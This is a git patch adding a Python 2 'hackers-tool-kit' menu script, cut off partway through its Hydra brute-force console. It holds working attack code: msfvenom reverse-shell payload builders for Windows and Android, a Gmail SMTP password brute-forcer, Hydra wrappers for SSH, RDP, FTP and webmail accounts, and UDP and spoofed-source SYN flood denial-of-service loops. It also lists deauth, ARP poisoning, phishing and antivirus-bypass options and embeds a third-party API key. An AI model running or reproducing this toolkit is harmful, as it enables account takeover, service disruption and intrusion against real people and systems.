- x = raw_input(N+'\033[91m[\033[0mhtk\033[91m]\033[94m->\033[92m: \033[0m') - if x == "?": - help() - if x == "winload" : - winload() - if x == "clear" : - os.system("clear") - mainbanner() - if x == "andload": - andload() - if x == "command": - c = raw_input("Command: ") - os.system(c) - if x == "msfcon" : - os.system("service postgresql start") - os.system("msfconsole") - if x == "set": - os.system("setoolkit") - if x == "msfven": - print R+"!ONLY TYPE THE ARGUMENTS DONT TYPE MSFVENOM\033[0m" - v = raw_input(G+"MSFVENOM: \033[0m") - os.system("msfvenom", v) - if x == "gmail" : - gmail() - if x == "insta": - insta() - if x == "fb" : - fb() - if x == "ipgrab": - ipgrab() - if x == "myip": - myip() - if x == "wifite": - wifite() - if x == "mon" : - mon() - if x == "netdev" : - netdev() - if x == "scannet": - scannet() - if x == "exit" : - import sys - print "follow \033[92m@unkn0wn_bali\033[0m on instagram" - sys.exit() - if x == "rebootl": - print R+"! ARE YOU SURE YOU WANT TO REBOOT YOUR WHOLE DEVICE !\033[0m" - c = raw_input("[y/n]> ") - if c == "y" : - os.system("reboot") - if c == "n" : - os.system("clear") - mainbanner() - main() - if x == "port": - port() - if x == "info": - info() - if x == "sysinfo": - sysinfo() - if x == "msfex": - msfex() - if x == "udp": - udp() - if x == "tcp": - tcp() - if x == "syn": - syn() - if x == "msfpa": - msfpa() - if x == "msfau": - msfau() - if x == "ping" : - ping() - if x == "multih": - multih() - if x == "msfall": - msfall() - if x == "hydra" : - hydra() - if x == "cupp": - cupp() - if x == "vdir": - vdir() - if x == "monoff": - monoff() - if x == "vpn": - vpn() - if x == "vpnoff": - vpnoff() - if x == "slowl": - slowl() - if x == "pidox": - pidox() - if x == "specnet": - specnet() - if x == "pingen": - pingen() - if x == "reaver": - reaver() - if x == "deauth": - deauth() - if x == "macc": - macc() - if x == "macoff": - macoff() - if x == "arppois": - appois() - if x == "sslscan": - sslscan() - if x == "payload": - payload() - if x == "crunch": - crunch() - if x == "traff": - traff() - if x == "resa": - resa() - if x == "resu": - resu() - if x == "hashid": - hashid() - if x == "restart": - restart() - if x == "medusa": - medusa() - if x == "wafwoof": - wafwoof() - if x == "cloud": - cloud() - if x == "brutex": - brutex() - if x == "methelp": - methelp() - if x == "winbyp": - winbyp() - if x == "exploit": - exploit() - if x == "phish": - phish() - if x == "datalist": - datalist() - found = True -mainbanner() -main() From f1a7408f894ea1f46efbf2c0c3e75ac05f683d22 Mon Sep 17 00:00:00 2001 From: unkn0wn_bali <40415158+unkn0wnh4ckr@users.noreply.github.com> Date: Sun, 17 Feb 2019 01:05:21 +0100 Subject: [PATCH 016/214] Add files via upload --- htk.py | 1961 ++++++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 1961 insertions(+) create mode 100644 htk.py diff --git a/htk.py b/htk.py new file mode 100644 index 0000000..1a47f43 --- /dev/null +++ b/htk.py @@ -0,0 +1,1961 @@ +#!/usr/local/bin/python +# coding: latin-1 +#if you use this code give me credit @unkn0wn_bali +#i do not give you permission to edit this script without my credit +import os +print "Starting hackers-tool-kit... [ * ]-[0%]" +import platform +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[5%]" +import webbrowser +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[9%]" +import hashlib +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[14%]" +import subprocess +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[19%]" +import zipfile +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[23%]" +import colorama +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[25%]" +from modules import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[26%]" +import modules.colors +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[27%]" +import builtwith +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[29%]" +from urllib2 import urlopen +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[31%]" +from urllib2 import URLError +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[34%]" +from urllib2 import HTTPError +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[38%]" +from urllib import urlencode +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[39%]" +from plugins.DNSDumpsterAPI import DNSDumpsterAPI +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[41%]" +import whois +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[45%]" +import json +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[47%]" +from urlparse import urlparse +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[50%]" +from re import search, sub +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[55%]" +import cookielib +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[56%]" +import socket +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[59%]" +from scapy.all import * +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[60%]" +from threading import Thread, active_count +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[63%]" +import random +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[67%]" +import string +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[70%]" +import signal +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[73%]" +import ssl +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[79%]" +import argparse +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[83%]" +import sys +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[86%]" +import socks +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[89%]" +import mechanize +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[90%]" +import requests +os.system("clear") +print "Starting hackers-tool-kit... [ *]-[94%]" +import time +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[96%]" +from datetime import datetime +now = datetime.now() +hour = now.hour +minute = now.minute +day = now.day +month = now.month +year = now.year +os.system("clear") +print "Starting hackers-tool-kit... [* ]-[99%]" +sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) +Gb = random._urandom(20000) +bytes = random._urandom(20000) +Kb = random._urandom(20000) +r = '\033[31m' +W = '\033[90m' +R = '\033[91m' +N = '\033[0m' +G = '\033[92m' +B = '\033[94m' +Y = '\033[93m' +LB = '\033[1;36m' +P = '\033[95m' +Bl = '\033[30m' +O = '\033[33m' +p = '\033[35m' +os.system("clear") +print "Starting hackers-tool-kit... [ * ]-[100%] \033[92m READY\033[0m" +os.system("printf '\033]2;Hackers-Tool-Kit | HTK | @unkn0wn_bali\a'") +os.system("service tor start") +os.system("service postgresql start") +os.system("clear") +def mainbanner(): + print N+""" _ _ _ _ _ _ _ + _ _ _ _ _ _ _ + | |__ __ _ ___| | _____ _ __ ___ | |_ ___ ___ | | | | _(_) |_ + | '_ \ / _` |/ __| |/ / _ \ '__/ __|_____| __/ _ \ / _ \| |_____| |/ / | __| + | | | | (_| | (__| < __/ | \__ \_____| || (_) | (_) | |_____| <| | |_ \033[91m + |_| |_|\__,_|\___|_|\_\___|_| |___/ \__\___/ \___/|_| |_|\_\_|\__|\033[34m + .............. \033[0mtype ? for help\033[34m + ..,;:ccc,. + ......''';lxO. + .....''''..........,:ld; + .';;;:::;,,.x, + ..'''. 0Xxoc:,. ... + .... ,ONkc;,;cokOdc',. + . OMo ':ddo. + dMc :OO; + 0M. .:o. + ;Wd + ;XO, \033[93mCreated By @unkn0wn_bali On Instagram\033[34m + ,d0Odlc;,.. + ..',;:cdOOd::,. + .:d;.':;. + 'd, .' + ;l .. + .o + c + .' + .\033[92m + ▄▄ ▄▄ ▄▄▄▄▄▄▄▄ ▄▄ ▄▄▄ + ██ ██ ▀▀▀██▀▀▀ ██ ██▀ + ██ ██ ██ ██▄██ + ████████ ██ █████ + ██ ██ █████ ██ █████ ██ ██▄ + ██ ██ ██ ██ ██▄ + ▀▀ ▀▀ ▀▀ ▀▀ ▀▀\033[0m + ▒ ░░▒░▒▒ ▓▒█░░ ░▒ ▒░▒ ▒▒ ▓▒░░▒ ░ ▒▓ ░▒▓ + ▒ ░▒░ ░ ▒▒ ░ ░ ▒ ░ ░▒ ▒░ ░░ ░▒ ░ ▒ + ░ ░░ ░ ▒ ░ ░ ░░ ░ ░ ░░ ░ + ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + """.decode('utf-8') +def help(): + print B+""" +▒▒ ▓▒█░▒ ▒▓▒ ▒ ░ ▒▒▓ ▒ ▒ ░ ░▒ ▒ ▒ ░░▒░▒▒▓▒▒░ ▒▓▒▒░ ▒ ░ ░ ▒░ ▒ ▒ + ▒ ▒▒ ░░ ░▒ ░ ░ ░ ▒ ▒ ░ ░ ░ ▒ ░▒░ ░▒ ░▒░ ▒ ░▒░ ░ ░ ░░ ░ ▒░ + ░ ▒ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░ ░ + ░ ░ ░ ░ ░ ░ ░ ░░ ░ ░ ░ ░ +\033[0m ░ +? : displays this message +clear : clears screen except for banner +exit : exits script +restart : re run hackers-tool-kit +rebootl : reboot whole device +winload : windows reverse_tcp payload +andload : android reverse_tcp payload +command : execute terminal command +msfcon : metasploit console +set : setoolkit console +msfven : msfvenom +gmail : gmail bruteforce +insta : instagram bruteforce +fb : facebook bruteforce +hydra : Black-Hydra bruteforce +medusa : Medusa bruteforce +ipgrab : host to ip address +myip : show your ip +wifite : automated wifi hacker +reaver : reaver automated [ wifi hack ] +mon : put device in monitor mode +monoff : put device out of monitor mode +netdev : find all devices in your network +scannet : scan for networks around you +specnet : scan a specific network +port : scan for ports on a host +info : info gather on a host [includes port scan]\033[91m █████████████████████ \033[0m +sysinfo : info about your system \033[91m ██ ██\033[0m +msfex : shows all metasploit exploits \033[91m ██ ██\033[0m +msfpa : shows all metasploit payloads \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfau : shows all metasploit auxiliarys \033[91m ██\033[90m ██ ██\033[91m ██\033[0m +msfall : shows all metasploit modules \033[91m ██ ██\033[0m +udp : UDP flood / dos \033[91m ██ \033[90m █ \033[91m ██\033[0m +tcp : TCP flood / dos \033[91m ██\033[90m █ \033[91m ██\033[0m +syn : SYN flood / dos \033[91m █ █\033[0m +slowl : Slow Loris dos \033[91m █ █ \033[0m +ping : pings host \033[91m █ █\033[0m +multih : start a multi handler \033[91m █ █\033[0m +cupp : make wordlists \/ vvvvvvvvv \/ +vdir : view files of a directory +vpn : activate a vpn +vpnoff : stop vpn +pidox : dox website +pingen : Generate a routers default pin +deauth : deauth attack / wifi jammer +macc : changes mac address +macoff : returns mac address to normal +arppois : ARP poisoning +sslscan : ssl scan a host +payload : make a metasploit payload of your choice +crunch : Make wordlists +traff : shows your internet traffic +resa : reset account password +resu : reset unix password +hashid : find the type of hash of a hash +wafwoof : check a web application for firewall +cloud : cloudflare bypass +brutex : auto bruteforce every service of a host +methelp : show meterpreter help +winbyp : windows defender bypass +exploit : use a metasploit exploit of your choice +phish : phishing automated +datalist: list all hosts & services in the database +msfev : shows all metasploit evasions +\033[91m---------------------------------------------------------------------------------\033[0m + """ +def winload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p windows/meterpreter/reverse_tcp LPORT={0} -f exe -o /root/{1}.exe LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def andload(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + pf = raw_input("Port: ") + na = raw_input("Name of File: ") + ak = 'msfvenom -p android/meterpreter/reverse_tcp LPORT={0} -o /root/{1}.apk LHOST={2}'.format(pf,na,ipaddr) + os.system(ak) +def gmail(): + #!/usr/bin/python + '''create by Ha3MrX''' + + import smtplib + from os import system + + def main(): + print '\033[93m=================================================' + print '\033[91m create by Ha3MrX ' + print '\033[93m=================================================' + print '\033[95m ++++++++++++++++++++ ' + print '\n ' + print '\033[92m _,. ' + print ' ' + print ' ' + print ' HA3MrX ' + print ' _,. ' + print ' ,` -.) ' + print ' ( _/-\\-._ ' + print ' /,|`--._,-^| , ' + print ' \_| |`-._/|| , | ' + print ' | `-, / | / / ' + print ' | || | / / ' + print ' `r-._||/ __ / / ' + print ' __,-<_ )`-/ `./ / ' + print ' \ `--- \ / / / ' + print ' | |./ / ' + print ' / // / ' + print ' \_/ \ |/ / ' + print ' | | _,^- / / ' + print ' | , `` (\/ /_ ' + print ' \,.->._ \X-=/^ ' + print ' ( / `-._//^` ' + print ' `Y-.____(__} ' + print ' | {__) ' + print ' () \033[91m V.1.0 ' + + main() + print '\033[0m[1] start the attack' + print '[2] exit' + option = input('==>') + if option == 1: + file_path = raw_input('path of passwords file :') + else: + system('clear') + exit() + pass_file = open(file_path,'r') + pass_list = pass_file.readlines() + def login(): + i = 0 + user_name = raw_input('target email :') + server = smtplib.SMTP_SSL('smtp.gmail.com', 465) + server.ehlo() + for password in pass_list: + i = i + 1 + print str(i) + '/' + str(len(pass_list)) + try: + server.login(user_name, password) + system('clear') + main() + print '\n' + print '[+] This Account Has Been Hacked Password :' + password + ' ^_^' + break + except smtplib.SMTPAuthenticationError as e: + error = str(e) + if error[14] == '<': + system('clear') + main() + print '[+] this account has been hacked, password :' + password + ' ^_^' + + break + else: + print '[!] password not found => ' + password + login() +def port(): + n = raw_input("Enter Target: ") + os.system("nmap " + n) +def insta(): + insta = raw_input("USERNAME> ") + jl = raw_input("WORDLIST> ") + k = raw_input("THREADS> ") + ma = 'python /root/hackers-tool-kit/tools/instagram.py {0} {1} {2}'.format(insta,jl,k) + os.system(ma) +def fb(): + facebook = raw_input("[EMAIL/ID->]: ") + word = raw_input("[WORDLIST->]: ") + ks = 'cd /root/hackers-tool-kit/tools && perl fb-brute.pl {0} {1}'.format(facebook,word) + os.system(ks) +def ipgrab(): + b = raw_input(Y+'Enter Host:\033[0m ') + ip = socket.gethostbyname(b) + print G+"------------------------\033[0m" + print N+"Host: ", b + print N+"IP: ", ip + print G+"------------------------\033[0m" +def myip(): + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print ("IP: ", ipaddr, " Gateway:", gateway, " Host:", host) +def wifite(): + os.system("wifite") +def mon(): + os.system("iwconfig") + i = raw_input("Select Interface: ") + os.system("airmon-ng start " + i) +def netdev(): + os.system("netdiscover") +def scannet(): + os.system("iwconfig") + m = raw_input("Select Interface: ") + print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" + j = raw_input("[y/n]> ") + if j == "y": + os.system("airodump-ng -w /root/SCAN " + m) + print Y+"! SCAN RESULTS SAVED IN /root/ DIRECTORY !\033[0m" + if j == "n": + os.system("airodump-ng " + m) +def info(): + params = [] + # Browser + br = mechanize.Browser() + + # Just some colors and shit + white = '\033[1;97m' + green = '\033[1;32m' + red = '\033[1;31m' + yellow = '\033[1;33m' + end = '\033[1;m' + info = '\033[1;33m[!]\033[1;m' + que = '\033[1;34m[?]\033[1;m' + bad = '\033[1;31m[-]\033[1;m' + good = '\033[1;32m[+]\033[1;m' + run = '\033[1;97m[~]\033[1;m' + + # Cookie Jar + cj = cookielib.LWPCookieJar() + br.set_cookiejar(cj) + + # Browser options + br.set_handle_equiv(True) + br.set_handle_redirect(True) + br.set_handle_referer(True) + br.set_handle_robots(False) + + # Follows refresh 0 but not hangs on refresh > 0 + br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1) + br.addheaders = [ + ('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')] + + + print '''\033[1;31m + _________ __ __ __ + / _____// |________|__| | __ ___________ + \_____ \\\\ __\_ __ \ | |/ // __ \_ __ \\ + / \| | | | \/ | <\ ___/| | \/ + /_______ /|__| |__| |__|__|_ \\\\___ >__| + \/ \/ \/\033[1;m''' + target = raw_input('\033[1;34m[?]\033[1;m Enter the target: ') + if 'http' in target: + parsed_uri = urlparse(target) + domain = '{uri.netloc}'.format(uri=parsed_uri) + else: + domain = target + try: + br.open('http://' + target) + target = 'http://' + target + except: + target = 'https://' + target + + def sqli(url): + print '%s Using SQLMap api to check for SQL injection vulnerabilities. Don\'t worry we are using an online service and it doesn\'t depend on your internet connection. This scan will take 2-3 minutes.' % run + br.open('https://suip.biz/?act=sqlmap') + br.select_form(nr=0) + br.form['url'] = url + req = br.submit() + result = req.read() + match = search(r"---(?s).*---", result) + if match: + print '%s One or more parameters are vulnerable to SQL injection' % good + option = raw_input( + '%s Would you like to see the whole report? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + print '\033[1;31m-\033[1;m' * 40 + print match.group().split('---')[1][:-3] + print '\033[1;31m-\033[1;m' * 40 + else: + print '%s None of parameters is vulnerable to SQL injection' % bad + + + def cms(domain): + try: + result = br.open('https://whatcms.org/?s=' + domain).read() + detect = search(r'class="nowrap" title="[^<]*">', result) + WordPress = False + try: + r = br.open(target + '/robots.txt').read() + if "wp-admin" in str(r): + WordPress = True + except: + pass + if detect: + print '%s CMS Detected : %s' % (info, detect.group().split('class="nowrap" title="')[1][:-2]) + detect = detect.group().split('">')[1][:-27] + if 'WordPress' in detect: + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + elif WordPress: + print '%s CMS Detected : WordPress' % info + option = raw_input( + '%s Would you like to use WPScan? [Y/n] ' % que).lower() + if option == 'n': + pass + else: + os.system('wpscan --random-agent --url %s' % domain) + else: + print '%s %s doesn\'t seem to use a CMS' % (info, domain) + except: + pass + + def honeypot(ip_addr): + result = {"0.0": 0, "0.1": 10, "0.2": 20, "0.3": 30, "0.4": 40, "0.5": 50, "0.6": 60, "0.7": 70, "0.8": 80, "0.9": 90, "1.0": 10} + honey = 'https://api.shodan.io/labs/honeyscore/%s?key=C23OXE0bVMrul2YeqcL7zxb6jZ4pj2by' % ip_addr + try: + phoney = br.open(honey).read() + if float(phoney) >= 0.0 and float(phoney) <= 0.4: + what = good + else: + what = bad + print '{} Honeypot Probabilty: {}%'.format(what, result[phoney]) + except KeyError: + print '\033[1;31m[-]\033[1;m Honeypot prediction failed' + + def whoisIt(url): + who = "" + print '{} Trying to gather whois information for {}'.format(run,url) + try: + who = str(whois.whois(url)).decode() + except Exception: + pass + test = who.lower() + if "whoisguard" in test or "protection" in test or "protected" in test: + print '{} Whois Protection Enabled{}'.format(bad, end) + else: + print '{} Whois information found{}'.format(good, end) + try: + data = json.loads(who) + for key in data.keys(): + print "{} :".format(key.replace("_", " ").title()), + if type(data[key]) == list: + print ", ".join(data[key]) + else: + print "{}".format(data[key]) + except ValueError: + print '{} Unable to build response, visit https://who.is/whois/{} {}'.format(bad, url, end) + pass + + def nmap(ip_addr): + port = 'http://api.hackertarget.com/nmap/?q=' + ip_addr + result = br.open(port).read() + result = sub(r'Starting[^<]*\)\.', '', result) + result = sub(r'Service[^<]*seconds', '', result) + result = os.linesep.join([s for s in result.splitlines() if s]) + print result + + def bypass(domain): + post = urlencode({'cfS': domain}) + result = br.open( + 'http://www.crimeflare.info/cgi-bin/cfsearch.cgi ', post).read() + + match = search(r' \b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b', result) + if match: + bypass.ip_addr = match.group().split(' ')[1][:-1] + print '%s Real IP Address : %s' % (good, bypass.ip_addr) + + def dnsdump(domain): + res = DNSDumpsterAPI(False).search(domain) + print '\n%s DNS Records' % good + for entry in res['dns_records']['dns']: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + for entry in res['dns_records']['mx']: + print '\n%s MX Records' % good + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n\033[1;32m[+]\033[1;m Host Records (A)' + for entry in res['dns_records']['host']: + if entry['reverse_dns']: + print '{domain} ({reverse_dns}) ({ip}) {as} {provider} {country}'.format(**entry) + else: + print '{domain} ({ip}) {as} {provider} {country}'.format(**entry) + print '\n%s TXT Records' % good + for entry in res['dns_records']['txt']: + print entry + print '\n%s DNS Map: https://dnsdumpster.com/static/map/%s.png\n' % (good, domain.strip('www.')) + + + def fingerprint(ip_addr): + try: + result = br.open('https://www.censys.io/ipv4/%s/raw' % ip_addr).read() + match = search(r'"os_description": "[^<]*"', result) + if match: + print '%s Operating System : %s' % (good, match.group().split('n": "')[1][:-5]) + except: + pass + + + ip_addr = socket.gethostbyname(domain) + print '%s IP Address : %s' % (info, ip_addr) + try: + r = requests.get(target) + header = r.headers['Server'] + if 'cloudflare' in header: + print '%s Cloudflare detected' % bad + bypass(domain) + try: + ip_addr = bypass.ip_addr + except: + pass + else: + print '%s Server: %s' % (info, header) + try: + print '%s Powered By: %s' % (info, r.headers['X-Powered-By']) + except: + pass + try: + r.headers['X-Frame-Options'] + except: + print '%s Clickjacking protection is not in place.' % good + except: + pass + fingerprint(ip_addr) + cms(domain) + try: + honeypot(ip_addr) + except: + pass + print "{}----------------------------------------{}".format(red, end) + whoisIt(domain) + try: + r = br.open(target + '/robots.txt').read() + print '\033[1;31m-\033[1;m' * 40 + print '%s Robots.txt retrieved\n' % good, r + except: + pass + print '\033[1;31m-\033[1;m' * 40 + nmap(ip_addr) + print '\033[1;31m-\033[1;m' * 40 + dnsdump(domain) + os.system('cd plugins && python theHarvester.py -d %s -b all' % domain) + try: + br.open(target) + print '%s Crawling the target for fuzzable URLs' % run + for link in br.links(): + if 'http' in link.url or '=' not in link.url: + pass + else: + url = target + '/' + link.url + params.append(url) + if len(params) == 0: + print '%s No fuzzable URLs found' % bad + quit() + print '%s Found %i fuzzable URLs' % (good, len(params)) + for url in params: + print url + sqli(url) + url = url.replace('=', '') + r = br.open(url).read() + if '' in r: + print '%s One or more parameters are vulnerable to XSS' % good + break + print '%s These are the URLs having parameters:' % good + for url in params: + print url + except: + pass +def sysinfo(): + os.system("ifconfig") + os.system("iwconfig") + os.system("neofetch") + gw = os.popen("ip -4 route show default").read().split() + s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM) + s.connect((gw[2], 0)) + ipaddr = s.getsockname()[0] + gateway = gw[2] + host = socket.gethostname() + print (" IP: ", ipaddr, " Gateway: ", gateway, " Host: ", host) +def msfex(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show exploits'""") +def udp(): + target = raw_input(N+"Target:\033[91m ") + ip = socket.gethostbyname(target) + port = input(N+"Port:\033[91m ") + os.system("service tor restart") + print N+"udp attack started on {0}.{1} | {2}-{3}-{4}".format(hour, minute, day, month, year) + os.system("sleep 2s") + sent = 0 + print "KILLING %s CONNECTIONS"%(ip) + while True: + sock.sendto(Gb, (ip,port)) + sock.sendto(bytes, (ip,port)) + sock.sendto(Kb, (ip,port)) + sent = sent + 1 + port = port + 1 + print B+"|+| Slapping \033[0m|\033[31m %s \033[0m| Port |\033[31m %s \033[0m| Bytes |\033[31m %s \033[0m|"%(ip,port,sent) + if port == 65534: + port = 1 +def tcp(): + tcp = raw_input(Y+"[\033[92m+\033[91m-\033[0mTCP\033[91m-\033[92m+\033[93m]\033[0m ") + os.system("python " + tcp) +def syn(): + def randomIP(): + ip = ".".join(map(str, (random.randint(0,255)for _ in range(4)))) + return ip + + def randInt(): + x = random.randint(1000,9000) + return x + + def SYN_Flood(dstIP,dstPort,counter): + total = 0 + print "Packets are sending ..." + for x in range (0,counter): + s_port = randInt() + s_eq = randInt() + w_indow = randInt() + + IP_Packet = IP () + IP_Packet.src = randomIP() + IP_Packet.dst = dstIP + + TCP_Packet = TCP () + TCP_Packet.sport = s_port + TCP_Packet.dport = dstPort + TCP_Packet.flags = "S" + TCP_Packet.seq = s_eq + TCP_Packet.window = w_indow + + send(IP_Packet/TCP_Packet, verbose=0) + total+=1 + sys.stdout.write("\nTotal packets sent: %i\n" % total) + + + def info(): + + dstIP = raw_input ("\nTarget IP : ") + dstPort = input ("Target Port : ") + + return dstIP,int(dstPort) + + + def main(): + dstIP,dstPort = info() + counter = input ("Packets : ") + SYN_Flood(dstIP,dstPort,int(counter)) + + main() + +def ping(): + p = raw_input("Enter Host: ") + os.system("ping " + p) +def msfpa(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show payloads'""") +def msfau(): + os.system("service postgresql start") + os.system("""msfconsole -x 'show auxiliary'""") +def multih(): + os.system("service postgresql start") + os.system("""msfconsole -x 'use multi/handler'""") +def msfall(): + os.system("service postgresql start") + os.sytem("""msfconsole -x 'show all'""") +def hydra(): + """ + This program is just a small program to shorten brute force sessions on hydra :) + But to be more satisfying results of the brute force. You better interact directly with hydra, + without having to use this black hydra console first: '). + If you find any errors in running our program. Can chat via facebook :). + Hydra is needed for the process of this program :). + """ + import sys, os, time + + # Restart #################### + def restart_program(): + python = sys.executable + os.execl(python, python, * sys.argv) + curdir = os.getcwd() + ############################## + + os.system("clear") + print B+"___ _ ____ ____ _ _ _ _ _ _ ___ ____ ____" + print "|__] | |__| | |_/ |__| \_/ | \ |__/ |__|" + print "|__] |___ | | |___ | \_ | | | |__/ | \ | |" + print G+"-----------------------------------------------------" + print N+"[]xxxxx[]::::::::::::::::::::> 24-07-2017 (7:53)" + print R+" [*] Author: DedSecTL --- [*] Version 1.0" + print N+"c=={:::::::::::::::> Black Hydra Console" + print R+" [*] My FB : https://m.facebook.com/100004136748473" + print N+"(}xxx{):::::::::> AndroSec1337 Cyber Team" + print + print " ===|[ Brute Force ]|===" + print + print " [01] Cisco Brute Force " + print " [02] VNC Brute Force " + print " [03] FTP Brute Force " + print " [04] Gmail Brute Force " + print " [05] SSH Brute Force " + print " [06] TeamSpeak Brute Force " + print " [07] Telnet Brute Force " + print " [08] Yahoo Mail Brute Force " + print " [09] Hotmail Brute Force " + print " [10] Router Speedy Brute Force " + print " [11] RDP Brute Force " + print " [12] MySQL Brute Force " + print + print " [00] Exit" + print + bhydra = raw_input("[*] B-Hydra > ") + + if bhydra == '01' or bhydra == '1': + print + print " +---------------------------+" + print " | Cisco Brute Force |" + print " +---------------------------+" + print + print + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -P %s %s cisco" % (word, iphost)) + sys.exit() + + elif bhydra == '02' or bhydra == '2': + print + print " +---------------------------+" + print " | VNC Brute Force |" + print " +---------------------------+" + print + print + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) + iphost = raw_input("[*] IP/Hostname : ") + + elif bhydra == '03' or bhydra == '3': + print + print " +------------------------------+" + print " | FTP Brute Force |" + print " +------------------------------+" + print + print + user = raw_input("[*] User : ") + iphost = raw_input("[*] IP/Hostname : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '04' or bhydra == '4': + print + print " +------------------------------+" + print " | Gmail Brute Force |" + print " +------------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '05' or bhydra == '5': + print + print " +--------------------------------+" + print " | SSH Brute Force |" + print " +--------------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) + sys.exit() + + elif bhydra == '06' or bhydra == '6': + print + print " +-------------------------+" + print " | TeamSpeak Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) + sys.exit() + + elif bhydra == '07' or bhydra == '7': + print + print " +-------------------------+" + print " | Telnet Brute Force |" + print " +-------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) + sys.exit() + + elif bhydra == '08' or bhydra == '8': + print + print " +---------------------------+" + print " | Yahoo Brute Force |" + print " +---------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '09' or bhydra == '9': + print + print " +----------------------------+" + print " | Hotmail Brute Force |" + print " +----------------------------+" + print + print + email = raw_input("[*] Email : ") + word = raw_input("[*] Wordlist : ") + os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) + sys.exit() + + elif bhydra == '10': + print + print " +-----------------------------+" + print " | Router Speedy Brute Force |" + print " +-----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) + sys.exit() + + elif bhydra == '11': + print + print " +----------------------------+" + print " | RDP Brute Force |" + print " +----------------------------+" + print + print + user = raw_input("[*] User : ") + word = raw_input("[*] Wordlist : ") + iphost = raw_input("[*] IP/Hostname : ") + os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) + sys.exit() + + elif bhydra == '12': + print + print " 